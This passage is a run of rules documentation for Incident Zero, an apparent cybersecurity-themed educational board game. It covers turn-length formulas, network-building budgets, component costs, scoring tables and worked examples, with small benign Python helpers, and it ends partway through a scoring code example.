═══════════════════════════════════════════════════════════════
Q: Why use (×2) + 1 and not something else? A: Playtesting showed this gives attackers enough time to progress realistically while keeping games from dragging. It's also easy to calculate mentally.
Q: Can I use both systems in the same campaign? A: Yes! Use Default Formula for most games, Tier System for special scenarios.
Q: What if players figure out the formula? A: That's fine. Knowing the formula doesn't give them an advantage (they still don't know how many cards in the chain).
Q: Can I adjust turn count during the game? A: NO. Turn count is set at game start and never changes. Rule 3 modifications happen before game starts only.
Q: What if my attack chain doesn't fit (e.g., 2 cards or 7 cards)? A:
- 2 cards: Use formula anyway (2 × 2 + 1 = 5 turns) or switch to Tier System
- 7+ cards: Use Tier 3-4 instead of formula
Q: How do I explain randomness to new players? A: "Real incident response isn't predictable. Sometimes attackers are faster, sometimes slower. We're rolling to capture that realism."
Q: Should I tell players the turn count? A: YES, always tell them at game start. (The mystery is about attack sophistication, not game length.)
Q: Can I use a d6 or d12 instead of d4? A: Not recommended (changes probability distribution). Stick with d4 or no roll at all.
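The two tracks above, the three critical rules and the FAQ limits, written out as a small calculator. This is an added example, not code from the Incident Zero project; the generalisation of the d4 modifier table to other dice in `modifier_distribution` is my own assumption, used only to show why swapping in a d6 changes the odds.

```python
"""Turn-count calculator for the Incident Zero Variable Game Length System.

Added example, not part of the Incident Zero rules text. It encodes the two
tracks (Default Formula and Tier + d4), turns the three critical rules and the
FAQ limits into checks, and compares the d4 modifier distribution with a d6.
"""
from collections import Counter
from dataclasses import dataclass

# Tier base ranges (low, high) in turns, from the reference card.
TIER_BASE = {1: (5, 7), 2: (8, 10), 3: (11, 13), 4: (14, 16)}

# d4 modifier table: 1 = -1 (tight), 2 or 3 = no change, 4 = +1 (loose).
D4_MODIFIER = {1: -1, 2: 0, 3: 0, 4: 1}


def default_formula(card_count: int) -> int:
    """System 1: Turn Count = (Attack Cards x 2) + 1.

    The FAQ allows 2 cards (5 turns) and sends 7+ card chains to Tier 3-4,
    so those limits are enforced here.
    """
    if card_count < 2:
        raise ValueError("an attack chain needs at least 2 cards")
    if card_count >= 7:
        raise ValueError("7+ cards: use Tier 3-4 instead of the formula")
    return card_count * 2 + 1


@dataclass(frozen=True)
class TierResult:
    """Outcome of the Tier + d4 track; low/high are the announced turn range."""
    tier: int
    d4: int
    modifier: int
    low: int
    high: int

    def announcement(self) -> str:
        # Rule 2: players hear the turn count, never the tier number.
        return f"You have {self.low}-{self.high} turns."


def tier_turn_count(tier: int, d4_roll: int) -> TierResult:
    """System 2: Final Turn Count = Tier Base + d4 Result."""
    if tier not in TIER_BASE:
        raise ValueError("tier must be 1-4")
    if d4_roll not in D4_MODIFIER:
        raise ValueError("d4 roll must be 1-4 (Rule 1: use the real roll)")
    mod = D4_MODIFIER[d4_roll]
    low, high = TIER_BASE[tier]
    return TierResult(tier, d4_roll, mod, low + mod, high + mod)


def apply_rule3(result: TierResult, adjustment: int, reason: str,
                game_started: bool = False) -> TierResult:
    """Rule 3: optional +/-1 adjustment, before play only, with a documented reason.

    Rejects the invalid uses listed in the rules: changes larger than 1,
    mid-game changes, and changes nobody wrote down.
    """
    if game_started:
        raise ValueError("no mid-game adjustments; turn count is fixed at start")
    if adjustment not in (-1, 1):
        raise ValueError("Rule 3 allows only +1 or -1")
    if not reason.strip():
        raise ValueError("Rule 3 requires the decision to be documented")
    return TierResult(result.tier, result.d4, result.modifier + adjustment,
                      result.low + adjustment, result.high + adjustment)


def modifier_distribution(sides: int) -> dict:
    """Probability of -1 / 0 / +1 when a die's lowest face means -1, its highest
    face means +1 and every other face means no change. For sides=4 this is the
    rules' d4 table; other dice are an assumption used only for comparison."""
    counts = Counter()
    for face in range(1, sides + 1):
        counts[-1 if face == 1 else 1 if face == sides else 0] += 1
    return {k: counts[k] / sides for k in (-1, 0, 1)}


if __name__ == "__main__":
    # The three worked examples from the rules text, then the dice comparison.
    for label, tier, roll in (("Criminal group", 2, 2), ("APT", 3, 4),
                              ("Script kiddie", 1, 1)):
        print(label + ":", tier_turn_count(tier, roll).announcement())
    print("4-card chain:", default_formula(4), "turns")
    print("d4:", modifier_distribution(4))
    print("d6:", modifier_distribution(6))
```

With a d6 the baseline outcome rises from 50% to about 67% and each extreme drops to about 17%, which is the distribution change the FAQ warns about.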
This system was introduced in v2.1 as players requested more realism in game pacing. Future versions may include:
For now, the two-track system (Default + Tier) provides both accessibility and depth.
Questions to answer through playtesting:
Feedback to collect:
- Typical game length vs. expected (from formula)
- Whether turn limits felt realistic
- Whether players felt rushed or bored
- Whether tier-hiding created effective mystery
Report findings to: GitHub Issues - Variable Game Length Feedback
Ready to set game length? Pick your formula and play!
docs/rules/module-network-building.md
Version: 2.2 - Playtest Edition
Last Updated: July 2026
The Network Building Module teaches players how to design IT infrastructure under budget constraints, business requirements, and trade-off decisions. This is a pre-game module designed to create the network context for other modules (particularly Incident Response, Hardening, and Disaster Recovery).
Key Concept: Architecture decisions create vulnerabilities that are discovered during investigations and audits. Bad decisions made here cost more money later.
Module Teaches:
- Primary: Network architecture, infrastructure design, security trade-offs
- Secondary: Budget prioritization, business vs. security balance, intentional/accidental vulnerabilities
Integration Point:
- Network Building can be played standalone OR as setup for Incident Response/Hardening/Disaster Recovery modules
- When combined with other modules, the network design created here becomes the context for those modules (see module-combinations.md)
| Difficulty | Budget | Recommended Use |
|---|---|---|
| Beginner | 60 | Learning networks; roomier budget, easier trade-offs |
| Standard | 50 | Balanced play, typical scenario |
| Advanced | 40 | Tight budget; hard trade-offs, strategic depth |
Budget represents: Time, money, and resources for infrastructure design
(v2.2) More budget = easier. Beginner gets the most budget; Advanced gets the least.
Narrative Framing:
"Your organization is building or rebuilding its IT infrastructure. You have limited budget and must support 500 employees with core business functions. Every decision will affect your security posture when this network is tested. Make smart trade-offs."
Key Point: Teams don't know yet which decisions will matter most. Some budget is "wasted" on nice-to-haves, some on security that (hopefully) won't be needed.
Components fall into 5 categories:
| Server Type | Cost | Capacity | Function | Security Notes |
|---|---|---|---|---|
| Email Server | 8 | 1 | Email system | Internet-facing; phishing target |
| Web Server | 7 | 1 | Public website | Internet-facing; exploit target |
| Database Server | 10 | 1 | Customer data | High-value target; access control critical |
| File Server | 6 | 2 | File storage | Often over-privileged; lateral movement point |
| Domain Controller | 12 | 2 | User identity (AD/Kerberos) | Critical; full compromise if breached |
| Development Server | 5 | 3 | Dev/testing environment | Weak security; staging ground for attacks |
| Backup Server | 9 | 1 | Data backup | Should be isolated; ransomware recovery |
| Cloud Workload | 4 | 2 | General cloud compute | Less control; API/credential exposure |
| Legacy System | 3 | 1 | Old/unmaintained system | High exploitability; hard to patch |
| Honeypot Decoy | 7 | 1 | Detection trap | Detects attackers; wastes attacker time |
Capacity Rules:
- Each server can host a certain number of services (shown in Capacity column)
- Services = business functions (email, web, database, identity, file storage, etc.)
- Can OVERLOAD a server (put more services than capacity allows) to save budget, but creates risk
| Device Type | Cost | Function | Gameplay Effect |
|---|---|---|---|
| Firewall | 12 | Perimeter defense | Blocks traffic between network zones |
| Intrusion Detection (IDS) | 10 | Network monitoring | Detects lateral movement (+1 investigation modifier in IR) |
| Intrusion Prevention (IPS) | 14 | Network blocking | Blocks exploits passively |
| Load Balancer | 8 | Traffic distribution | Improves availability without extra capacity |
| VPN Gateway | 9 | Remote access | Enables secure remote work; attack surface if weak |
| Email Gateway | 6 | Email filtering | Stops phishing; reduces SOCIAL_ENGINEERING risk |
| Web Application Firewall (WAF) | 11 | App-level defense | Protects web servers from app attacks |
| Network Segmentation Switch | 10 | Microsegmentation | Creates isolated network zones |
| SIEM System | 15 | Centralized logging | Logs everything; helps IR investigations (+1 to Investigate in IR module) |
| Honeypot Network | 8 | Detection | Detects lateral movement; wastes attacker time |
How servers are logically organized and connected:
| Decision | Cost | Security Impact | Notes |
|---|---|---|---|
| Flat Network | 0 | No segmentation | All servers on same network; vulnerable but simple |
| Segmented Network (3 zones) | 5 | Basic isolation | Separate DMZ, Internal, Sensitive zones |
| Fully Isolated (multiple firewalls) | 12 | Strong isolation | Each zone protected; expensive but resilient |
| Cloud Hybrid (on-prem + cloud) | 8 | Complex | Adds cloud security considerations |
| Cloud First (mostly cloud) | 6 | Different attack surface | Less on-prem; more cloud API risk |
Architecture decisions are NON-NEGOTIABLE - teams must pick one to organize their network.
Teams MUST satisfy every Required item by end of game. Recommended items are not mandatory, but skipping one is recorded as a gap (and costs points at scoring).
| Requirement | Status | Satisfied By | Notes |
|---|---|---|---|
| Email | Required | Email Server, OR hosted on a Cloud Workload | Non-negotiable |
| Web Presence | Required | Web Server, OR hosted on a Cloud Workload | Online business |
| Customer Database | Required | Database Server, OR hosted on a Cloud Workload | Cloud-hosting the crown jewels is a recorded risk |
| User Identity (AD/Kerberos) | Required | Domain Controller | No substitute |
| Disaster Recovery (Backup) | Required (v2.2) | Backup Server | No backup = automatic FAIL on this requirement, recorded as a CRITICAL gap (not an instant game loss) |
| File Storage | Recommended (v2.2) | File Server, OR spare capacity/overload on another server | Gap if missing |
| Development/Testing | Recommended (v2.2) | Dev Server, OR overload another server | Overloading a server for dev is explicitly allowed |
| Remote Work VPN | Recommended (v2.2) | VPN Gateway | Gap if missing: risky remote-access workarounds |
Key Rule: Required items are fixed. Teams must find places to host them, even if it means cloud-hosting or overloading servers.
Affordability Check (v2.2) — the Required list fits every difficulty:
Physical location of infrastructure:
| Model | Cost | Notes |
|---|---|---|
| Self-Hosted (On-Premises) | 0 | Team controls; responsibility for patching |
| Cloud-Hosted (AWS/Azure/GCP) | 0 | Provider controls; less direct control |
| Hybrid | 0 | Mix of on-prem and cloud; complex |
Teams take 5 "Build Turns" (~3-4 minutes each to discuss and decide).
Each turn is a design-review phase (v2.2): the team may take any number of actions — place as many components as they can afford — before ending the turn. Turns are not a one-purchase limit; they are checkpoints where the design gets stress-tested.
Between turns, the Threat Orchestrator reveals a development: draw one Operational Event or Business Requirement card from the standalone decks (cards/network-building/standalone/), or narrate one (a stakeholder demand, a vendor issue, a budget change). This gives teams a reason to revisit the design each turn.
Available actions:
Cost: Server cost (3-12 Budget)
Effect: Add server to infrastructure
How It Works:
1. Choose a server card
2. Decide which business services it will host
3. Pay the cost
4. Track remaining budget
Example: "We're placing a Domain Controller on-premises (12 Budget). It will host user identity, with a spare capacity slot for file storage. Remaining budget: 38."
Constraints:
- Duplicates allowed (v2.2): you may deploy more than one server of the same type; each copy costs full price
- Can't host a required service on a server that doesn't exist
- Can OVERLOAD servers (see Overload Mechanic below)
Cost: Device cost (6-15 Budget)
Effect: Add network defense or monitoring
How It Works:
1. Choose a security device card
2. Describe which servers/zones it protects
3. Pay the cost
4. Track placement on the network diagram
Example Turn: "We're deploying a Firewall between our DMZ and Internal network (12 Budget). This blocks unauthorized traffic between zones. Remaining budget: 26."
Cost: Architecture cost (0-12 Budget)
Effect: Determine how servers logically connect
How It Works:
1. Choose one architecture type (only ONE per game)
2. Describe zone organization
3. Pay the cost
4. Document on the network diagram
Example Turn: "We're implementing a Segmented Network with 3 zones (5 Budget):
- DMZ: Email and Web servers (internet-facing)
- Internal: File servers and user workstations
- Sensitive: Database and Domain Controller
Remaining budget: 21."
Cost: Usually 0 (some cloud strategies cost money)
Effect: Determines where infrastructure physically lives
How It Works:
1. Decide on a hosting strategy
2. Apply it to the appropriate servers
3. Document on the infrastructure card
4. Pay if cloud-specific (usually free)
Example Turn: "We're hosting our email and web servers on AWS (0 cost). Domain Controller stays on-premises. This reduces on-prem complexity but adds cloud management responsibility."
Cost: 0
Effect: Take no further actions this turn; preserve budget
Use When: Satisfied with current design or holding budget in reserve for surprises
Problem: Limited budget + mandatory services = imperfect solutions
Solution: Overload servers (put more services on one server than intended)
How It Works (v2.2):
- If a server has capacity for 2 services, you can put 3+ on it
- Cost: +1 Budget per extra service beyond capacity (paid when the service is added)
- Benefit: Still far cheaper than buying another server
- Risk: An overloaded server is harder to isolate; a compromise affects multiple services
Example Scenario: "Budget remaining: 5. Still need to host Development Services.
- Option A: Buy a Dev Server for 5 (leaves 0 budget)
- Option B: Put Dev on our File Server, which already hosts File Storage and Email Backup (2/2). Overload by 1: pay 1 Budget (leaves 4)
We choose B: the File Server becomes (File Storage, Email Backup, Dev Services — OVERLOADED 3/2)"
Consequences (Discovered Later):
- Overloaded servers are easier to pivot from (when other modules investigate)
- If one service is compromised, ALL services on that server are at risk
- Recovery is harder (you can't isolate just the compromised service)
Teams inevitably leave security gaps:
| Gap Type | How It Happens | Cost Saved | Later Consequence |
|---|---|---|---|
| No Segmentation | Too expensive (5-12) | 5-12 | All servers accessible after initial compromise |
| No Firewall | Too expensive (12) | 12 | Can't enforce zone boundaries |
| Legacy Systems | Cheap (3) | 7+ | Easy to exploit; unpatched vulnerabilities |
| Overloaded Servers | Budget pressure | 2-11 (server cost minus overload fees) | Multi-service compromise; hard to isolate |
| No Detection (no IDS/SIEM) | Expensive (10-15) | 10-15 | Attacks undetected; investigations harder |
| No Email Gateway | Phishing defense (6) | 6 | Phishing easier in IR module |
| No Honeypot | Luxury item (7) | 7 | Attackers move silently |
| All Cloud or All On-Prem | Simplicity | 0 | Security model doesn't fit actual architecture |
| No Backup Server | Expensive (9) | 9 | Automatic FAIL on the Disaster Recovery requirement |
| No SIEM | Most expensive (15) | 15 | Investigation takes longer |
Key Insight: These gaps are discovered when other modules test the network (Audit, Incident Response, Disaster Recovery).
Teams create an Infrastructure Summary Card:
YOUR NETWORK ARCHITECTURE (Standard, 50 Budget)
SERVERS DEPLOYED:
- Cloud Workload (AWS) - Hosts: Email + Web (2/2, cloud-hosted)
- Database Server (On-Prem) - Hosts: Customer Database
- Domain Controller (On-Prem) - Hosts: Identity, File Storage,
Dev Services (OVERLOADED 3/2, +1 Budget paid)
- Backup Server (On-Prem, isolated) - Hosts: Backups / DR
ARCHITECTURE: Segmented (3 zones)
- DMZ: (cloud workload fronts the internet)
- Internal: Users
- Sensitive: Database, Domain Controller, Backup Server
SECURITY DEVICES:
- Email Gateway (incoming mail)
- NO Firewall, NO IDS/SIEM, NO VPN Gateway, NO Honeypot
HOSTING: Hybrid (cloud front end, on-prem crown jewels)
BUDGET SPENT: 47/50 (3 remaining)
- Cloud Workload 4 + Database 10 + Domain Controller 12 + Backup 9
+ Segmented Architecture 5 + Email Gateway 6 + Overload 1 = 47
IDENTIFIED GAPS (for other modules):
- Overloaded Domain Controller (identity + files + dev on one box)
- No IDS/SIEM (attacks undetected; investigations harder)
- No VPN Gateway (remote workers use risky workarounds)
- Email and Web share one cloud workload (single point of failure)
After building, teams receive a score reflecting their design choices:
| Metric | Score |
|---|---|
| Requirements | +2 per Required item satisfied (Email, Web, Database, Identity, Backup) — max +10 |
| Segmentation | Implemented Segmented or Fully Isolated architecture = +10 |
| Detection | Deployed IDS, IPS, or SIEM = +5 |
| Recovery | Deployed Backup Server = +5 |
| Redundancy | Duplicated a critical server or deployed a Load Balancer = +5 |
| Contingency Reserve | 5-15 Budget remaining = +5; 1-4 remaining = +2; 0 or 16+ remaining = 0 |
Maximum: 40 points. The reserve bonus rewards smart utilization — meet the requirements and keep a small cushion; hoarding budget scores nothing.
Example Scoring (the sample network above, Standard 50):
- All 5 Required items satisfied: +10
- Segmentation implemented: +10
- No IDS/IPS/SIEM: 0
- Backup Server deployed: +5
- No redundancy: 0
- 3 Budget remaining: +2
- Total: 27 points — Good design
Interpretation Tiers (v2.2):
- 32-40 points: Enterprise-grade design; comprehensive protection
- 22-31 points: Good design; most critical gaps covered
- 12-21 points: Adequate design; some gaps remain
- Below 12 points: High risk; many gaps; future modules will be challenging
Reachability check: at Beginner (60), a team can score the full 40 — e.g., Cloud Workload 4 (Email+Web) + Database 10 + Domain Controller 12 (Identity + File) + Backup 9 + Segmented 5 + IDS 10 + second Cloud Workload 4 (redundant web) = 54 spent, 6 remaining → 10+10+5+5+5+5 = 40.
For use in Incident Response and Audit modules:
- List all identified gaps
- Note severity (CRITICAL, HIGH, MEDIUM, LOW)
- These gaps become modifiers when other modules test the network
When Network Building leads to other modules:
→ Incident Response Module:
- Network design determines which attacks are possible
- Overloaded servers make lateral movement easier
- Missing IDS/SIEM makes investigation harder
→ Hardening Module:
- Teams can see which network gaps they should fix
- Fixing a gap they identified = +2 bonus to that defense
→ Disaster Recovery Module:
- Network gaps increase crisis budget costs
- Overloaded servers = more data compromised
- No backup = no recovery option
→ Audit & Compliance Module:
- Pre-built network is audited against NIST/CIS
- Audit findings highlight network gaps
- Findings become modifiers in Incident Response
Constraint: Very limited budget; must make hard choices
Starting Narrative: "You're a startup with limited funding. You need to build infrastructure but can't afford everything. Choose wisely."
Likely Outcome:
- Flat network (save 5)
- Few security devices
- Multiple overloaded servers
- High vulnerability; good learning about consequences
Constraint: Moderate budget; can afford some security
Starting Narrative: "Your organization is growing. You have some budget for infrastructure but not unlimited. Balance growth with security."
Likely Outcome:
- Segmented network
- Basic security devices (firewall, email gateway, IDS or SIEM)
- Some overloading but manageable
- Moderate vulnerability; balanced design
Constraint: Good budget; comprehensive design possible
Starting Narrative: "You're rebuilding infrastructure with sufficient budget. Design for security AND resilience."
Likely Outcome:
- Segmented or isolated network
- Multiple security devices
- Minimal overloading
- Good security posture; few gaps
Add compliance requirements:
- NIST CSF, CIS Controls, PCI-DSS, HIPAA
- Teams must choose devices that satisfy compliance
- Some devices count toward multiple requirements
Assign roles:
- Finance wants cheap solutions
- Operations wants reliability
- Security wants defense-in-depth
- Teams must negotiate trade-offs
After Incident Response or Disaster Recovery:
- Teams rebuild the network based on lessons learned
- Compare the new design to the original
- Measure improvement
| Component | Cost | Notes |
|---|---|---|
| Servers | 3-12 | Higher cost = more critical function |
| Devices | 6-15 | Higher cost = more capability |
| Architecture | 0-12 | One per game; segmented is best balance |
| Hosting | 0-8 | Usually free; some cloud options cost |
Summary of rule changes for playtesters (all labelled "(v2.2)" in the text above):
cards/network-building/standalone/). Previously 5 turns × 1 action made the mandatory requirements physically impossible to place.
Network Building Module - Rules & Mechanics
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition
docs/standalone-games/network-building.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Network Building Standalone is a 30-45 minute competitive resource management game where teams design IT infrastructure under budget constraints with random business requirements and operational challenges.
Core Concept:
- Budget: Limited funding (40-60 Network Budget tokens by difficulty; 50 standard)
- Requirements: Random business needs forcing tough trade-offs
- Randomness: Equipment failures, budget surprises, requirement changes
- Scoring: Multi-dimensional (security, budget efficiency, capability, resilience)
- Winner: Team with the highest final score
Best For:
- Teaching infrastructure trade-offs
- Understanding security budget constraints
- Decision-making under uncertainty
- Standalone 30-45 minute session
- Competitive team play (2-4 teams)
Game Duration: 5-7 turns (by difficulty) × 4-5 minutes per turn = 20-30 minutes gameplay
- Setup: 5 minutes (explain rules, distribute materials)
- Gameplay: 20-30 minutes
- Scoring & Debrief: 5-10 minutes
- Total: 30-45 minutes
Each turn represents ~1 quarter of the fiscal year:
- Reveal a Business Requirement (what does the business need this quarter?)
- Reveal an Operational Event (failure, budget change, attack, opportunity)
- Team deploys components, handles the event, or passes
Server cards (cards/network-building/core-deck/server-cards.md). Each card has: Type, Cost, Capacity, Security Profile
┌──────────────────────┐
│ EMAIL SERVER │
│ Cost: 8 │
│ Capacity: 1 service │
│ Security: Low │
│ (Phishing target) │
└──────────────────────┘
Server Types Available:
- Email Server (8 Budget, 1 capacity, Low security)
- Web Server (7 Budget, 1 capacity, Low security)
- Database Server (10 Budget, 1 capacity, Medium security)
- File Server (6 Budget, 2 capacity, Low security)
- Domain Controller (12 Budget, 2 capacity, Medium security)
- Development Server (5 Budget, 3 capacity, Low security)
- Backup Server (9 Budget, 1 capacity, High security)
- Cloud Workload (4 Budget, 2 capacity, Medium security)
- Legacy System (3 Budget, 1 capacity, Very Low security)
- Honeypot Decoy (7 Budget, 1 capacity, Medium security)
Overload rule: a server may host more services than its capacity for +1 Budget per extra service — but overloaded servers are a recorded risk (see Variations, now a standard rule).
Security device cards (cards/network-building/core-deck/security-device-cards.md). Each card has: Type, Cost, Benefit
┌──────────────────────┐
│ FIREWALL │
│ Cost: 12 │
│ Blocks traffic │
│ between network │
│ zones (segmentation) │
└──────────────────────┘
Security Device Types Available (v2.2 — benefits stated in plain language; the Scoring section says what each counts as):
- Firewall (12 Budget) — blocks traffic between network zones; counts as Firewall and toward segmentation
- IDS (10 Budget) — spots attacks in progress; counts as detection
- IPS (14 Budget) — blocks known exploits in real time; counts as detection
- Email Gateway (6 Budget) — filters phishing and email malware
- WAF (11 Budget) — protects web applications from injection/XSS attacks
- SIEM (15 Budget) — central logging and alerting; counts as detection, helps audits
- Network Segmentation Switch (10 Budget) — isolates network zones; counts as segmentation
- VPN Gateway (9 Budget) — secure remote access for staff
- Load Balancer (8 Budget) — spreads load across duplicated services; counts as redundancy
- Honeypot Network (8 Budget) — decoy segment that exposes intruders; counts as detection
Business Requirement cards (cards/network-building/standalone/business-requirement-cards.md): 20 cards (REQ-01 to REQ-20) of random quarterly business needs. Each names the requirement, what satisfies it, and the score impact.
┌──────────────────────┐
│ BUSINESS REQUIREMENT │
├──────────────────────┤
│ REQ-01: "New Product │
│ Launch Website" │
│ │
│ Satisfied by: Web │
│ Server or cloud web │
│ │
│ Missed: -5 points │
└──────────────────────┘
Operational Event cards (cards/network-building/standalone/operational-event-cards.md): 16 cards (EVT-01 to EVT-16) of random incidents, opportunities, and challenges. Each states its effect and which designs mitigate it.
┌──────────────────────┐
│ OPERATIONAL EVENT │
├──────────────────────┤
│ EVT-01: "Email │
│ Server Failure" │
│ │
│ Pay 5 Budget to fix │
│ OR -10 points │
│ │
│ Mitigated by: │
│ redundant/cloud email│
└──────────────────────┘
Final Score = Security Score + Budget Score + Capability Score + Resilience Score − Requirement/Event penalties (+ bonuses)
Teams win by maximizing total score, not just saving budget.
Each Team Receives:
- Starting Budget: 50 Network Budget tokens (Standard difficulty)
- Infrastructure Summary Sheet (to track what they've built)
- Score Tracking Sheet
- Network Diagram Worksheet (optional, for visualization)
Shuffle and place face-down:
- Business Requirement deck (all 20 cards; 1 drawn per turn)
- Operational Event deck (all 16 cards; 1 drawn per turn)
**"You're a CIO designing your organization's IT infrastructure for the next 18 months. You have limited budget ($50K, represented as 50 tokens). Each quarter brings new business requirements and operational challenges. You must balance:**
- Getting the work done (business requirements)
- Keeping things secure (security devices)
- Managing money (budget efficiency)
- Surviving incidents (resilience features)
**After 6 quarters (turns), we'll score your infrastructure. Highest score wins."**
Threat Orchestrator flips top Business Requirement Card:
"It's Q2. The executive team wants to acquire a customer database company. You need to integrate their 2 million customer records into your infrastructure. You MUST have a functioning Database Server by end of Q2 or you lose 10 points (deal falls through)."
Team Notes:
- What service is needed?
- When is the deadline? (end of this turn unless the card says otherwise)
- What's the penalty if you skip? (points deduction)
Teams Discuss: Do we have it? If not, how do we get it?
Threat Orchestrator flips top Operational Event Card:
"OPERATIONAL EVENT: Your Email Server just failed. It's been down for 2 hours. You can:
- Option A: Pay 5 budget for emergency repair (get email back online)
- Option B: Skip repair (email stays down all quarter) - lose 10 points (users upset, productivity down)
- Option C: Use this as an excuse to upgrade (replace with a new server, normal cost)"
Teams Decide: How to handle the incident?
Teams may take ANY NUMBER of the following actions, in any order, limited only by budget (previously one action per turn):
Example: "We're deploying a Database Server on-premises. Cost: 10 budget. Remaining: 40 budget. This satisfies the Q2 acquisition requirement. No penalty!"
Example: "We're deploying an IDS on our internal network. Cost: 10 budget. Remaining: 30 budget. That gives us detection — if a ransomware or insider event comes up, we're covered."
Example: "Email Server failed. We're paying 5 budget for emergency repair. That lets us avoid the -10 penalty. Remaining: 25 budget."
Update Trackers:
- Subtract budget spent
- Mark servers/devices deployed
- Apply any penalties from unmet requirements
- Prepare for the next turn
Next Turn Begins
Final Score = Security + Budget + Capability + Resilience − requirement/event penalties (+ bonuses)
Requirement and event penalties/bonuses (from the cards) are tracked as they happen and applied to the final total. Dimension scores can go negative.
Measures defensive capability against attacks
| Security Metric | Points | How Scored |
|---|---|---|
| IDS or IPS Deployed | +5 | Detect/prevent network attacks |
| SIEM Deployed | +5 | Centralized logging & detection |
| Firewall Deployed | +4 | Perimeter / zone enforcement |
| Backup Server Deployed | +4 | Ransomware recovery |
| Email Gateway Deployed | +3 | Phishing protection |
| WAF Deployed | +3 | Web application protection |
| Honeypot Deployed | +3 | Early warning system |
| Network Segmentation | +3 | Lateral movement prevention (Segmentation Switch or segmented architecture) |
Maximum Security Score: 30 points (5+5+4+4+3+3+3+3 = 30)
Examples:
- Only Email Gateway: 3 points (basic phishing defense, weak)
- IDS + SIEM + Email Gateway: 13 points (good detection)
- Full suite (IDS + SIEM + Firewall + Backup + Email Gateway + WAF + Honeypot + Segmentation): 30 points (enterprise-grade, but expensive)
Rewards smart utilization: meeting the business's needs within budget while keeping a small contingency reserve. Hoarding budget is NOT rewarded — an unspent token did no work.
Budget Remaining at Game End → Points:
| Budget Remaining | Points | Reading |
|---|---|---|
| 5-15 left | 20 | Requirements met, plus a contingency reserve for surprises |
| 1-4 left | 15 | Fully invested, but nothing left for the next incident |
| 0 left | 10 | Ran completely dry |
| 16-25 left | 10 | Under-invested; capability probably missing |
| 26+ left | 5 | Hoarding — budget is not the goal |
Anti-hoarding check: if the team missed 2 or more Business Requirements during the game, halve their Budget Score (round down). Saving money by failing the business is not efficiency.
Examples:
- Spent 42, left 8: 20 points (met needs, kept a reserve)
- Spent 46, left 4: 15 points (all-in; one bad event from trouble)
- Spent 20, left 30: 5 points (a pile of tokens and a network full of gaps)
Does infrastructure meet business needs?
| Capability | Points | Notes |
|---|---|---|
| Email Service | +3 | Basic business function (Email Server or cloud-hosted) |
| Web Service | +3 | Public presence / e-commerce |
| Database Service | +4 | High-value data management |
| File Storage | +2 | Internal collaboration |
| Domain Controller | +3 | User identity & security |
| Development Capability | +2 | Dev Server or dev via overload |
| Backup Server | +3 | Disaster recovery |
| Remote Access (VPN Gateway) | +2 | Work-from-home support |
| Cloud Workload | +2 | Scalability & redundancy |
| Honeypot | +1 | Early-warning capability |
Maximum Capability Score: 25 points (3+3+4+2+3+2+3+2+2+1 = 25)
Penalties for Missing Key Services:
- No Email service: -5 (business can't communicate)
- No Database service: -10 (core data has no home)
- No Domain Controller: -3 (no central identity)
- No VPN Gateway (only if a remote-work requirement card was drawn): -3
(Ransomware consequences for missing backups come from the event cards themselves — see EVT-11.)
Examples:
- Email, Web, Database, File, Domain Controller, Backup: 3+3+4+2+3+3 = 18 points (good)
- The same plus VPN Gateway and a Honeypot: 18+2+1 = 21 points (excellent)
- Email, Web, File, Domain, Backup but NO Database: 3+3+2+3+3 = 14, minus 10 = 4 points (the penalty bites)
Ability to survive and recover from failures
Resilience Factors:
| Factor | Points | Criteria |
|---|---|---|
| Backup Server | +8 | Can recover from ransomware/data loss |
| Detection | +7 | IDS/IPS/SIEM can spot attacks early |
| Redundancy | +5 | Duplicate server in the same role OR Load Balancer |
| Isolation | +3 | Network segmentation prevents spread |
| Recovery Plan | +2 | Has BOTH Backup Server and detection |
Maximum Resilience Score: 25 points (8+7+5+3+2 = 25)
Penalties for Vulnerabilities (v2.2):
- No Backup Server: -10 (one disaster from catastrophe)
- Single point of failure (all critical services on one server): -5
- No detection capability: -3
- Flat network (no segmentation): -2
Examples:
- Backup + Detection + Segmentation + Redundancy: 8+7+3+5, +2 recovery plan = 25 points (maximum; very resilient)
- Backup + Detection, flat network, no redundancy: 8+7+2−2 = 15 points (adequate)
- No backup, no detection, flat network: −10−3−2 = −15 points (high risk; yes, scores go negative)
Built (total 46 of 50; 4 remaining):
- Email Server (8): handles email
- Web Server (7): public website
- Database Server (10): customer data
- File Server (6): internal files
- Backup Server (9): disaster recovery
- Email Gateway (6): phishing defense
Check: 8+7+10+6+9+6 = 46 ✓. No Domain Controller (too expensive; skipped for budget). Flat network.
Scoring Team A:
Security Score:
- Email Gateway: +3
- Backup Server: +4
- No IDS/IPS/SIEM/Firewall/WAF/Honeypot/Segmentation: 0
- Total: 7 points
Budget Score:
- 4 budget remaining → 1-4 band
- Total: 15 points
Capability Score:
- Email +3, Web +3, Database +4, File +2, Backup +3 = 15
- No Domain Controller: −3
- Total: 12 points
Resilience Score:
- Backup Server: +8
- No detection: −3
- Flat network: −2
- Total: 3 points
Team A Final Score: 7 + 15 + 12 + 3 = 37 points
Built (total 47 of 50; 3 remaining):
- Email Server (8)
- Web Server (7)
- Database Server (10)
- Domain Controller (12)
- IDS (10)
Check: 8+7+10+12+10 = 47 ✓. No Backup Server (sacrificed for detection). Flat network.
Scoring Team B:
Security Score:
- IDS: +5
- Total: 5 points
Budget Score:
- 3 left → 1-4 band
- Total: 15 points
Capability Score:
- Email +3, Web +3, Database +4, Domain Controller +3 = 13
- Total: 13 points
Resilience Score:
- Detection: +7
- No Backup Server: −10
- Flat network: −2
- Total: −5 points (negative!)
Team B Final Score: 5 + 15 + 13 − 5 = 28 points
RESULT: Team A (37) beats Team B (28)
Lesson: Having Backup is critical for resilience, even if it means fewer security devices.
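As an added example (not code from the print-and-play bundle), the Python below encodes the 40-point Network Building card and the standalone Security/Budget/Capability/Resilience tables above, so a TO can cross-check hand tallies like Team A and Team B. The Design class and helper names are this example's own, and it assumes "detection" means IDS/IPS/SIEM and "segmentation" means the architecture or a Segmentation Switch, as the Resilience table states.

```python
from dataclasses import dataclass

# Added example, not the bundle's own code: the scoring tables above, as functions.
DETECTION = {"IDS", "IPS", "SIEM"}                  # Resilience table: IDS/IPS/SIEM
HONEYPOTS = {"Honeypot Decoy", "Honeypot Network"}  # server form or device form


@dataclass
class Design:
    """One team's end-of-game sheet (card names as printed on the page)."""
    servers: list               # e.g. ["Email Server", "Backup Server"]
    devices: set                # e.g. {"IDS", "Email Gateway"}
    services: set               # hosted: subset of email/web/database/file/identity/dev
    budget_left: int
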